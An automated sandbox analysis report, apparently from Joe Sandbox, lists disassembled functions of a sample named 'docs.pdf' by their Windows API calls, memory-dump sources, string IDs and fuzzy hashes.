                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00176520
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
                                                            • Instruction ID: 926be2e1d918155ef9b7134084d4c3b1524b6f379eccf7105dbe0c8f19642aec
                                                            • Opcode Fuzzy Hash: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
                                                            • Instruction Fuzzy Hash: 6F315C76201614AFEB118F50CC8AFEB3BA9EB09761F044069FE089A291D7759C82CB64
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
                                                            • Instruction ID: 21e790a57bf192bcfa9f5019e67bb4624b833b1d8ca69ad632e325b2bb88fe5e
                                                            • Opcode Fuzzy Hash: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
                                                            • Instruction Fuzzy Hash: 4021A475B02205BBD699B5218D42FFB779CAF307A4B084030FE05972A2E7A2DE11C6E5
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                            • _wcstok.LIBCMT ref: 0015EEFF
                                                            • _wcscpy.LIBCMT ref: 0015EF8E
                                                            • _memset.LIBCMT ref: 0015EFC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: 3e8d5f0173a29351ff530be293f8813fc21d13a17934216fcc5949fd136919e5
                                                            • Instruction ID: 5aef2d3b7bcc3b463ba4447efe5ed056693c48272df06b80b6324bc8306322e8
                                                            • Opcode Fuzzy Hash: 3e8d5f0173a29351ff530be293f8813fc21d13a17934216fcc5949fd136919e5
                                                            • Instruction Fuzzy Hash: 54C16071508704DFC714EF24C881AAAB7E4EF85310F14492DF9A99B6A2DB70ED49DB82
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00166F14
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00166F35
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166F48
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00166FFE
                                                            • inet_ntoa.WSOCK32(?), ref: 00166FBB
                                                              • Part of subcall function 0014AE14: _strlen.LIBCMT ref: 0014AE1E
                                                              • Part of subcall function 0014AE14: _memmove.LIBCMT ref: 0014AE40
                                                            • _strlen.LIBCMT ref: 00167058
                                                            • _memmove.LIBCMT ref: 001670C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 293b33ac16be589693547266814c55a73d29700d3f0499d16c9ec779d3e9181d
                                                            • Instruction ID: 1010986a127ed3aa7efd11dc3fbf36ba40cce9f721519dbee6f90fd47afa74f0
                                                            • Opcode Fuzzy Hash: 293b33ac16be589693547266814c55a73d29700d3f0499d16c9ec779d3e9181d
                                                            • Instruction Fuzzy Hash: E781E131508304ABD714EF24CC82FBBB7A9AF84718F14491CF6159B2E2DB71AD41CBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
                                                            • Instruction ID: dc22dd030c9a3901695ecf6980081281eb93f06160fe51c4301cfe5c75e775cf
                                                            • Opcode Fuzzy Hash: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
                                                            • Instruction Fuzzy Hash: AF717B70904119EFCB14CF98CC88AFEBBB9FF85314F108159FA15AA651C734AA52DBA0
APIs
• IsWindow.USER32(00E95A00), ref: 0017B6A5
• IsWindowEnabled.USER32(00E95A00), ref: 0017B6B1
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0017B795
• SendMessageW.USER32(00E95A00,000000B0,?,?), ref: 0017B7CC
• IsDlgButtonChecked.USER32(?,?), ref: 0017B809
• GetWindowLongW.USER32(00E95A00,000000EC), ref: 0017B82B
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0017B843
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
• Instruction ID: 2a051cff7bacc6683ead7d8bdabab318ec487e6621fc0f1c9a1f25c7ebaa92f1
• Opcode Fuzzy Hash: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
• Instruction Fuzzy Hash: 42718D74608204AFDB289F64C8E4FFA7BB9FF59300F148069FA5D972A1C731A981CB50
APIs
• _memset.LIBCMT ref: 0016F75C
• _memset.LIBCMT ref: 0016F825
• ShellExecuteExW.SHELL32(?), ref: 0016F86A
  • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
  • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
  • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
• GetProcessId.KERNEL32(00000000), ref: 0016F8E1
• CloseHandle.KERNEL32(00000000), ref: 0016F910
Strings
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
• Instruction ID: d657bd50a817aac3a21dba114ea486ab79670d4beb8e4f2ac2a7d363d4e83a44
• Opcode Fuzzy Hash: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
• Instruction Fuzzy Hash: 4261BE75A00619DFCF14EF54D880AAEBBF5FF48310B15846DE84AAB752CB30AD52CB90
APIs
• GetParent.USER32(?), ref: 0015149C
• GetKeyboardState.USER32(?), ref: 001514B1
• SetKeyboardState.USER32(?), ref: 00151512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00151540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0015155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 001515A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 001515C8
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
• Instruction ID: 805bbcc7e80c6d5f91ab078eae3f5f02eac49b11de9d2657fd1836f80d401e59
• Opcode Fuzzy Hash: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
• Instruction Fuzzy Hash: 8E5102A06143D5BEFB335234CC45BBA7EA95B46306F088589E9E54D8C2D3E4DCC8D750
APIs
• GetParent.USER32(00000000), ref: 001512B5
• GetKeyboardState.USER32(?), ref: 001512CA
• SetKeyboardState.USER32(?), ref: 0015132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00151357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00151374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001513B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001513D9
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
• Instruction ID: b602bb6843df4a0efef660b37f62c320150b59f583aae48ace538efd8489cfff
• Opcode Fuzzy Hash: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
• Instruction Fuzzy Hash: D35115A05446D5BDFB3387248C55BBA7FA96B06312F088489E9F84ECC2D394AC8CD750
APIs
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
• Instruction ID: 91d59e9ea690d263f25c75b9452ff98c3f90c241eb8d6afa8ad0ebbcca0a4a71
• Opcode Fuzzy Hash: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
• Instruction Fuzzy Hash: E041C465C20128B6CB14FBF48C869CFB3A89F15710F508462F928E3121F734E794C7A5
APIs
  • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7
  • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0
• lstrcmpiW.KERNEL32(?,?), ref: 001538F3
• _wcscmp.LIBCMT ref: 0015390F
• MoveFileW.KERNEL32(?,?), ref: 00153927
• _wcscat.LIBCMT ref: 0015396F
• SHFileOperationW.SHELL32(?), ref: 001539DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: f88b12c98aeb7b2696ba59f72063381ec325f81a5e8bf0d6956841537e90affe
• Instruction ID: 7e174b5ac4a0251594cd3350d3bab7da26764a36e34747dfc51a00f759d97c97
• Opcode Fuzzy Hash: f88b12c98aeb7b2696ba59f72063381ec325f81a5e8bf0d6956841537e90affe
• Instruction Fuzzy Hash: E4417EB140C3849EC755EF64C4819EFB7E8AF98385F00192EB8AAC7151EB74D69CC752
APIs
• _memset.LIBCMT ref: 00177519
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001775C0
• IsMenu.USER32(?), ref: 001775D8
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00177620
• DrawMenuBar.USER32 ref: 00177633
Strings
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
• Instruction ID: 272d712f10a712f5e746f591f3d2c5b51ea2eab26c63379d42878a1a2b8e3f8d
• Opcode Fuzzy Hash: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
• Instruction Fuzzy Hash: 61411A75A04609EFDB10DF54D884E9ABBF9FF08314F048129FA5997290D730AD91CF90
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0017125C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00171286
• FreeLibrary.KERNEL32(00000000), ref: 0017133D
  • Part of subcall function 0017122D: RegCloseKey.ADVAPI32(?), ref: 001712A3
  • Part of subcall function 0017122D: FreeLibrary.KERNEL32(?), ref: 001712F5
  • Part of subcall function 0017122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00171318
• RegDeleteKeyW.ADVAPI32(?,?), ref: 001712E0
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
• Instruction ID: 191a75863c081a074a5eaa609148ded887dd8d4188662ccffbe1d9393368dd74
• Opcode Fuzzy Hash: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
• Instruction Fuzzy Hash: 37314BB1901109BFDB14DB94DC89AFFB7BCFF08350F104169F509E2641EB749E859AA0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0017655B
• GetWindowLongW.USER32(00E95A00,000000F0), ref: 0017658E
• GetWindowLongW.USER32(00E95A00,000000F0), ref: 001765C3
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001765F5
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0017661F
• GetWindowLongW.USER32(00000000,000000F0), ref: 00176630
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0017664A
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
• Instruction ID: 491c3e9a1ec298d776043797cca27a37840b7b184c9bb14003fdf8b794c22291
• Opcode Fuzzy Hash: dae7c5011b1439be736a51918c2c91233adfef80699e673b69abbb3e3e4835c3
• Instruction Fuzzy Hash: B8312431644610AFDB21CF28DC84F553BF1FB5A750F2982A8F5098B6B6CB71AC81EB51
APIs
  • Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001664D9
• WSAGetLastError.WSOCK32(00000000), ref: 001664E8
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166521
• connect.WSOCK32(00000000,?,00000010), ref: 0016652A
• WSAGetLastError.WSOCK32 ref: 00166534
• closesocket.WSOCK32(00000000), ref: 0016655D
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166576
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
• Instruction ID: 8437455de1f848cf38ca93a37da46d2814461a800b4868c60fec5f8a5efe9a43
• Opcode Fuzzy Hash: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
• Instruction Fuzzy Hash: BD31AF31600218AFDB10AF24DC85BBE7BBCEB45754F048029F90AD7291CB70AD95CBA2
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0014E123
                                                            • SysAllocString.OLEAUT32 ref: 0014E144
                                                            • SysFreeString.OLEAUT32 ref: 0014E14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0014E167
                                                            • SysAllocString.OLEAUT32(?), ref: 0014E175
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 24069f4106e2591dfa265f60ad94873b04b4f0de0dcadaeb3b860addbd0c20e2
                                                            • Instruction ID: d74dea28847b1305dc477c4ef719b48fa3c3373e5fddf8727b518063c01e3e73
                                                            • Opcode Fuzzy Hash: 24069f4106e2591dfa265f60ad94873b04b4f0de0dcadaeb3b860addbd0c20e2
                                                            • Instruction Fuzzy Hash: F1214135644108AF9B149FA8DC89DAB77ECFB09B60B508139F919CB270DB70DC828B64
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 3ab1a5cf8bbd3581a22d60b4a989e3ded0c8740f785b3b45b1a0b7795fa52667
                                                            • Instruction ID: a9db13f39bd6972148a6f36e7af1ed925ace8b4239353ee776638f9a312a5dcf
                                                            • Opcode Fuzzy Hash: 3ab1a5cf8bbd3581a22d60b4a989e3ded0c8740f785b3b45b1a0b7795fa52667
                                                            • Instruction Fuzzy Hash: B9216732104214A6D239A624ED52EE7B398EF66300F10443DF985872A1EB60AE83D391
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001778A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001778AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001778B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001778C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001778D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
